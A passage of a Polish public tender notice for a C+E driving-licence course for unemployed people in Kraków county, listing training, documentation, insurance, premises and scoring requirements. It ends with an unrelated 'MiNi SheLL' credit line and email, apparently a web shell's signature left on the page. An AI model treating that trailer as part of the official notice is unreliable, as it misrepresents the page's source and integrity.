9.	Program szkolenia musi zawierać informacje, o których mówi Rozporządzenie Ministra Pracy i Polityki Społecznej z dn. 02  marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 476, poz. 315), a mianowicie:
a)	Nazwę i zakres szkolenia
b)	Czas trwania i sposób organizacji szkolenia
c)	Wymagania wstępne dla uczestników szkolenia
d)	Cele szkolenia
e)	Plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar,                    z uwzględnieniem części teoretycznej i praktycznej
f)	Treści szkolenia w zakresie poszczególnych zajęć edukacyjnych
g)	Wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych
h)	Sposób sprawdzenia efektów szkolenia.
10.	Wykonawca zobowiązany będzie do prowadzenia odpowiedniej dokumentacji: 
a)	Dzienna lista obecności uczestników szkolenia;
b)	Dziennik zajęć zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych;
c)	Oświadczenia uczestników potwierdzających odbiór materiałów dydaktycznych i biurowych;
d)	Oświadczenia uczestników potwierdzających odbiór ciepłych posiłków;
e)	Imienna lista, na której uczestnicy szkolenia będą potwierdzać otrzymanie zwrotu kosztów przejazdu na szkolenie;
f)	Rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenie; 
g)	Protokół z egzaminu, jeżeli zostanie przeprowadzony. 
11.	Wykonawca zobowiązany będzie do przechowywania dokumentów potwierdzających realizację przedmiotowego szkolenia, a w szczególności: programu szkolenia, harmonogramu, dokumentów związanych z kosztami kursu, kosztorys, listy obecności uczestników, do dnia 31 grudnia 2020 roku.
12.	Na zakończenie kursu, Wykonawca wypłaci uczestnikom szkolenia zwrot kosztów przejazdu w wysokości 10,00 PLN (słownie: dziesięć złotych 00/100) za każdy dzień obecności na zajęciach. Podstawą do naliczenia wysokości zwrotu będzie lista obecności. Kwotę zwrotu kosztów przejazdu za  uczestników kursu należy wliczyć w cenę szkolenia wskazaną w formularzu ofertowym.
13.	Na podstawie art. 41 ust.7 i ust. 8 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r., Nr 69, poz. 415 z późn. zm.) Wykonawca zobowiązany będzie do ubezpieczenia uczestników kursu do następstw nieszczęśliwych wypadków z wyłączeniem osób posiadających prawo do stypendium szkoleniowego. Okres ubezpieczenia obejmie cały okres trwania szkolenia. Wykonawca dokona ubezpieczenia kursantów na podstawie imiennej listy sporządzonej przez Zamawiającego. Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej w dniu rozpoczęcia zajęć.
14.	Wykonawca zobowiązany będzie do informowania społeczeństwa o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczanie w dokumentacji szkoleniowej informacji o udziale Unii Europejskiej a także oznakowania miejsca realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.7.2006) oraz Rozporządzenia Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006)  i wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013
15.	Wykonawca, w trakcie realizacji zajęć teoretycznych, zapewni  dostęp do serwisu kawowego (tj. kawy, herbaty, wody mineralnej, drożdżówek lub ciasteczek) a także jeden ciepły, jednodaniowy posiłek dziennie.
16.	Wykonawca, pod  rygorem  utraty prawa do zapłaty za  szkolenie, zobowiązany będzie do niezwłocznego   poinformowania Zamawiającego  o:
a)	Nie zgłoszeniu się Uczestników na  szkolenie,
b)	Przerwaniu szkolenia lub rezygnacji  z  uczestnictwa oraz każdorazowej nieobecności skierowanych  osób bezrobotnych,
c)	Innych sytuacjach, które mają wpływ na realizację programu szkolenia. i umowy.
17.	Wykonawca zobowiązany będzie do przekazania Zamawiającemu, w terminie do 5 dni od dnia zakończenia szkolenia, następujących dokumentów:
a)	Oryginału ankiet oceniających przeprowadzonych wśród uczestników szkolenia;
b)	Oryginału imiennego wykazu osób, które ukończyły szkolenie;
c)	Oryginału imiennego wykazu osób, które nie ukończyły szkolenia; 
d)	Kserokopii rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji poświadczony za zgodność z oryginałem;
e)	Kserokopii dziennika zajęć poświadczona za zgodność z oryginałem;
f)	Kserokopii  list obecności poświadczona za zgodność z oryginałem;
g)	Kserokopii protokołu z egzaminu;
h)	Oryginału kosztorysu powykonawczego;
i)	Kserokopii wszystkich zaświadczeń i certyfikatów potwierdzających ukończenie szkolenia, poświadczone za zgodność z oryginałem;
j)	Oryginału oświadczeń uczestników potwierdzających odbiór materiałów dydaktycznych, ciepłych posiłków;
k)	Oryginału imiennej listy, na której uczestnicy potwierdzą otrzymanie zwrotu kosztów przejazdu;
l)	Inną dokumentację niezbędną do rozliczenia kursu.
18.	Wykonawca winien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. W zakresie warunków lokalowych musi posiadać co najmniej jedną salę o powierzchni nie mniejszej niż 25 m kw., wyposażoną w stoliki i miejsca siedzące. Sale dydaktyczne powinny być wyposażone w sprzęt audiowizualny, flipchart, tablice szkolne lub magnetyczne, makietę lub programy komputerowe umożliwiające symulowanie sytuacji na drodze, filmy video prezentujące zasady bezpieczeństwa, ruchu drogowego, zasady kierowania pojazdem, czynności kontrolno - obsługowe, zasady udzielania pierwszej pomocy. Do oferty należy załączyć informację dotyczącą lokalizacji, w której realizowane będą zajęcia wraz ze szczegółowym opisem wyposażenia sal dydaktycznych,                            a  w przypadku zajęć praktycznych,  wymienić należy wykorzystywany podczas zajęć sprzęt i urządzenia oraz ich ilość. Plac manewrowy , utwardzony, o powierzchni 180 m kw., wyposażony w pachołki i tyczki o łącznej wysokości 2 m, winien być wyłączony z ruchu pojazdów innych niż przeznaczone do nauki jazdy. Pojazdy wykorzystywane do prowadzenia szkolenia muszą być dopuszczone do ruchu, przystosowane do nauki jazdy, muszą spełniać wymagania określone w przepisach dot. warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia, muszą także być oznaczone nazwą i adresem ośrodka szkoleniowego.
19.	Wykonawca zobowiązany będzie do przeprowadzenia wśród uczestników zajęć oceny merytorycznej i technicznej przebiegu szkolenia, m.in. na podstawie formularza ankiety oceniającej - stanowiącej załącznik nr 9 do SIWZ, jak również do przedstawienia jej wyników Zamawiającemu. 
20.	Wykonawca, przed rozpoczęciem szkolenia, zobowiązany będzie do zapoznania jego uczestników ze szczegółowym programem poprzez przekazanie im harmonogramu realizowanych zajęć..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50.00</li>
<li>2. liczba przeprowadzonych szkoleń z zakresu objętego przedmiotowym zamówieniem w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzi - 10.00</li>
<li>3. liczba osób przeszkolonych z zakresu objętego przedmiotowym zamówieniem w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzieleni - 10.00</li>
<li>4. certyfikat jakości usług, który potwierdzałby wysoki standard świadczonych usług - 30.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prawo jazdy kategorii  C + E.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pod nazwą  prawo jazdy kategorii C + E dla osób bezrobotnych zarejestrowanych w Urzędzie Pracy Powiatu Krakowskiego.
2.	W ramach kursu prawa jazdy na kategorię C+E przeszkolonych będzie 15 osób w ramach 3 grup 5-osobowych.
3.	Każda grupa rozpoczynać będzie zajęcia szkoleniowe pierwszego dnia roboczego miesiąca. Warunek ten należy mieć na uwadze przy sporządzaniu harmonogramu. 
4.	Wykonawca zobowiązany będzie do zorganizowania jednego egzaminu zewnętrznego, którego koszt zostanie wliczony w cenę szkolenia. W przypadku, gdy uczestnik zajęć nie zda egzaminu zewnętrznego zorganizowanego przez Wykonawcę - Zamawiający nie będzie ponosił kosztów jego poprawki.
5.	lość godzin kursu na kat. C + E wynosi 46 godzin, w tym 20 godzin zajęć teoretycznych, 25 godzin zajęć praktycznych oraz 1 godzina przeznaczona na egzamin wewnętrzny.

Zajęcia teoretyczne: 1 godzina = 45 minut
Zajęcia praktyczne: 1 godzina = 60 minut

Dzienny wymiar zajęć dydaktycznych nie może przekroczyć 7 godzin zajęć teoretycznych. Zajęcia odbywać się będą od poniedziałku do piątku, w godzinach pomiędzy 8.00 a 18.00          z uwzględnieniem dwóch przerw kawowych dla uczestników realizujących zajęcia teoretyczne.
Zajęcia praktyczne obejmują zajęcia na placu manewrowym i w ruchu drogowym, rozpoczynają się po przeprowadzeniu zajęć teoretycznych.
Przeprowadzenie zajęć, zarówno praktycznych jak i teoretycznych, winno być potwierdzone            w karcie przeprowadzonych zajęć każdorazowo po ich zakończeniu przez osobę prowadzącą zajęcia i uczestnika zajęć.
Miejsce realizacji szkolenia winno znajdować się w mieście Krakowie, w miejscu dogodnym pod względem dojazdu dla osób dojeżdżających z terenu Powiatu Krakowskiego.

6.	Wykonawca zobowiązany będzie do zapewnienia wszystkim uczestnikom materiałów dydaktycznych, jak również do przekazania jednego kompletu do Urzędu Pracy Powiatu Krakowskiego (jeżeli zachodzi taka konieczność, Wykonawca wlicza w cenę szkolenia koszt przeznaczonego dla UPPK zestawu materiałów dydaktycznych). Dodatkowo, Wykonawca wyposaży uczestników zajęć w niezbędne materiały piśmienne i biurowe.
7.	Szkolenie winno zakończyć się oceną nabytych umiejętności w postaci egzaminu, wydaniem zaświadczenia o ukończeniu szkolenia dla osób ubiegających się o prawo jazdy C+E oraz certyfikatu opatrzonego logo Unii Europejskiej, EFS a także logo projektu 7 Życzeń.
Na wniosek Wykonawcy Zamawiający prześle elektroniczną wersję wymaganych oznakowań i logo.
Wzór zaświadczenia o ukończeniu szkolenia dla osób ubiegających się o prawo jazdy kat. C+E oraz wzór certyfikatu, potwierdzone za zgodność z oryginałem przez uprawnionego przedstawiciela Wykonawcy, winny być załączone do oferty. 
8.	Podstawowy zakres programu szkolenia musi być zgodny z programem nauczania zawartym w ustawie Prawo o ruchu drogowym oraz rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005 r. Nr 217, poz. 1834).
9.	Program szkolenia musi zawierać informacje, o których mówi Rozporządzenie Ministra Pracy i Polityki Społecznej z dn. 02  marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 476, poz. 315), a mianowicie:
a)	Nazwę i zakres szkolenia
b)	Czas trwania i sposób organizacji szkolenia
c)	Wymagania wstępne dla uczestników szkolenia
d)	Cele szkolenia
e)	Plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar,                    z uwzględnieniem części teoretycznej i praktycznej
f)	Treści szkolenia w zakresie poszczególnych zajęć edukacyjnych
g)	Wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych
h)	Sposób sprawdzenia efektów szkolenia.
10.	Wykonawca zobowiązany będzie do prowadzenia odpowiedniej dokumentacji: 
a)	Dzienna lista obecności uczestników szkolenia;
b)	Dziennik zajęć zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych;
c)	Oświadczenia uczestników potwierdzających odbiór materiałów dydaktycznych i biurowych;
d)	Oświadczenia uczestników potwierdzających odbiór ciepłych posiłków;
e)	Imienna lista, na której uczestnicy szkolenia będą potwierdzać otrzymanie zwrotu kosztów przejazdu na szkolenie;
f)	Rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenie; 
g)	Protokół z egzaminu, jeżeli zostanie przeprowadzony. 
11.	Wykonawca zobowiązany będzie do przechowywania dokumentów potwierdzających realizację przedmiotowego szkolenia, a w szczególności: programu szkolenia, harmonogramu, dokumentów związanych z kosztami kursu, kosztorys, listy obecności uczestników, do dnia 31 grudnia 2020 roku.
12.	Na zakończenie kursu, Wykonawca wypłaci uczestnikom szkolenia zwrot kosztów przejazdu w wysokości 10,00 PLN (słownie: dziesięć złotych 00/100) za każdy dzień obecności na zajęciach. Podstawą do naliczenia wysokości zwrotu będzie lista obecności. Kwotę zwrotu kosztów przejazdu za  uczestników kursu należy wliczyć w cenę szkolenia wskazaną w formularzu ofertowym.
13.	Na podstawie art. 41 ust.7 i ust. 8 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r., Nr 69, poz. 415 z późn. zm.) Wykonawca zobowiązany będzie do ubezpieczenia uczestników kursu do następstw nieszczęśliwych wypadków z wyłączeniem osób posiadających prawo do stypendium szkoleniowego. Okres ubezpieczenia obejmie cały okres trwania szkolenia. Wykonawca dokona ubezpieczenia kursantów na podstawie imiennej listy sporządzonej przez Zamawiającego. Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej w dniu rozpoczęcia zajęć.
14.	Wykonawca zobowiązany będzie do informowania społeczeństwa o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczanie w dokumentacji szkoleniowej informacji o udziale Unii Europejskiej a także oznakowania miejsca realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.7.2006) oraz Rozporządzenia Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006)  i wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013
15.	Wykonawca, w trakcie realizacji zajęć teoretycznych, zapewni  dostęp do serwisu kawowego (tj. kawy, herbaty, wody mineralnej, drożdżówek lub ciasteczek) a także jeden ciepły, jednodaniowy posiłek dziennie.
16.	Wykonawca, pod  rygorem  utraty prawa do zapłaty za  szkolenie, zobowiązany będzie do niezwłocznego   poinformowania Zamawiającego  o:
a)	Nie zgłoszeniu się Uczestników na  szkolenie,
b)	Przerwaniu szkolenia lub rezygnacji  z  uczestnictwa oraz każdorazowej nieobecności skierowanych  osób bezrobotnych,
c)	Innych sytuacjach, które mają wpływ na realizację programu szkolenia. i umowy.
17.	Wykonawca zobowiązany będzie do przekazania Zamawiającemu, w terminie do 5 dni od dnia zakończenia szkolenia, następujących dokumentów:
a)	Oryginału ankiet oceniających przeprowadzonych wśród uczestników szkolenia;
b)	Oryginału imiennego wykazu osób, które ukończyły szkolenie;
c)	Oryginału imiennego wykazu osób, które nie ukończyły szkolenia; 
d)	Kserokopii rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji poświadczony za zgodność z oryginałem;
e)	Kserokopii dziennika zajęć poświadczona za zgodność z oryginałem;
f)	Kserokopii  list obecności poświadczona za zgodność z oryginałem;
g)	Kserokopii protokołu z egzaminu;
h)	Oryginału kosztorysu powykonawczego;
i)	Kserokopii wszystkich zaświadczeń i certyfikatów potwierdzających ukończenie szkolenia, poświadczone za zgodność z oryginałem;
j)	Oryginału oświadczeń uczestników potwierdzających odbiór materiałów dydaktycznych, ciepłych posiłków;
k)	Oryginału imiennej listy, na której uczestnicy potwierdzą otrzymanie zwrotu kosztów przejazdu;
l)	Inną dokumentację niezbędną do rozliczenia kursu.
18.	Wykonawca winien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. W zakresie warunków lokalowych musi posiadać co najmniej jedną salę o powierzchni nie mniejszej niż 25 m kw., wyposażoną w stoliki i miejsca siedzące. Sale dydaktyczne powinny być wyposażone w sprzęt audiowizualny, flipchart, tablice szkolne lub magnetyczne, makietę lub programy komputerowe umożliwiające symulowanie sytuacji na drodze, filmy video prezentujące zasady bezpieczeństwa, ruchu drogowego, zasady kierowania pojazdem, czynności kontrolno - obsługowe, zasady udzielania pierwszej pomocy. Do oferty należy załączyć informację dotyczącą lokalizacji, w której realizowane będą zajęcia wraz ze szczegółowym opisem wyposażenia sal dydaktycznych,                            a  w przypadku zajęć praktycznych,  wymienić należy wykorzystywany podczas zajęć sprzęt i urządzenia oraz ich ilość. Plac manewrowy , utwardzony, o powierzchni 180 m kw., wyposażony w pachołki i tyczki o łącznej wysokości 2 m, winien być wyłączony z ruchu pojazdów innych niż przeznaczone do nauki jazdy. Pojazdy wykorzystywane do prowadzenia szkolenia muszą być dopuszczone do ruchu, przystosowane do nauki jazdy, muszą spełniać wymagania określone w przepisach dot. warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia, muszą także być oznaczone nazwą i adresem ośrodka szkoleniowego.
19.	Wykonawca zobowiązany będzie do przeprowadzenia wśród uczestników zajęć oceny merytorycznej i technicznej przebiegu szkolenia, m.in. na podstawie formularza ankiety oceniającej - stanowiącej załącznik nr 9 do SIWZ, jak również do przedstawienia jej wyników Zamawiającemu. 
20.	Wykonawca, przed rozpoczęciem szkolenia, zobowiązany będzie do zapoznania jego uczestników ze szczegółowym programem poprzez przekazanie im harmonogramu realizowanych zajęć..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50.00</li>
<li>2. liczba przeprowadzonych szkoleń z zakresu objętego przedmiotowym zamówieniem w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzi - 10.00</li>
<li>3. liczba osób przeszkolonych z zakresu objętego przedmiotowym zamówieniem w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzieleni - 10.00</li>
<li>4. certyfikat jakości usług, który potwierdzałby wysoki standard świadczonych usług - 30.00</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com